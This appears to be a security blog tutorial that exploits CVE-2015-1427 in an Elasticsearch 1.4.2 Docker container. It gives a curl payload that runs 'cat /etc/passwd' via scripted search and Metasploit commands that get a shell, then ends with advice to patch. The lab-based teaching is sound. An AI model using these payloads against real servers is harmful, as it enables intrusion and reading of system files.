---
layout: post
title: The container is in danger!
author: terceranexus6
image:
  feature: banners/header.jpg
tags: seguridad docker contenedores
---

Hello again and welcome back to the **Security Sprint** second edition ;)

Keeping with the topic of the last week, I'm going further in containers security. Now, we are going to learn the danger inside [Elasticsearch](https://www.elastic.co/products/elasticsearch), a distributed, RESTful search and analytics engine.

<img src="{{ site.url }}/assets/images/dev.to/elastic-logo.svg.png" style="display: block; margin: 0 auto;">

To clearly understand my point, let's first launch a container running Elasticsearch. I'm using **1.4.2 version** on purpose.

```
# docker run -d -p 9200:9200 --name es benhall/elasticsearch:1.4.2
```

By default **Docker** drops certain Linux capabilities and blocks syscalls to add a default level of security.

We are going to add a record using `curl` (as the vuln we are using is only effective against not null databases), once we start listening, be patient ;)

```
# curl -XPUT 'http://0.0.0.0:9200/twitter/user/terceranexus6' -d '{"name":"Paula"}'
```

We are going to take advantage of [CVE-2015-1427](https://nvd.nist.gov/vuln/detail/CVE-2015-1427), an Elasticsearch vulnerability that allowed to use JAVA for searching, and getting access to additional information, for example getting access to the *Operating System name*.

<img src="{{ site.url }}/assets/images/dev.to/3ltglyjea1npk82spquc.png.jpeg" style="display: block; margin: 0 auto;">

We can see, it echoes the results on the HTTP request, but this could be additional applications to launch additional attacks. But this can allow us to access to sensitive data... for example **passwd**.

```
# curl http://docker:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript": {"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getText()"}}}'
```

Now, now, it's the turn of **Metasploit**.

[Metasploit](https://www.metasploit.com/) is a penetration testing framework. It could take a while to launch!

```
# docker run -it --link es:es --entrypoint bash benhall/metasploit
# chmod +x start.sh && ./start.sh
```

<img src="{{ site.url }}/assets/images/dev.to/z5cytg5vl3hr1rrswp4m.png" style="display: block; margin: 0 auto;">

And now we are exploiting Elasticsearch using it. In metasploit terminal write:

```
use exploit/multi/elasticsearch/search_groovy_script
set TARGET 0
set RHOST es
exploit
````

If everything went OK, we should have access to the container. Try and see it using `ls`.

<img src="{{ site.url }}/assets/images/dev.to/rc08g3m394nlvwfe9xoi.png" style="display: block; margin: 0 auto;">

<img src="{{ site.url }}/assets/images/dev.to/lhtyoFj.gif" style="display: block; margin: 0 auto;">

Yikes! Scary! what should we do if we want to keep our container secure? Always take care of having the last versions of your tools, in order to have the patched versions. **This can't assure our security**, but certainly will reduce the risk.

For more information on the topic, take a look to this [amazing tutorial](https://www.katacoda.com/courses/docker-security/elasticsearch-exploit).

*Also written in: [https://dev.to/terceranexus6/the-container-is-in-danger-4hji](https://dev.to/terceranexus6/the-container-is-in-danger-4hji)*
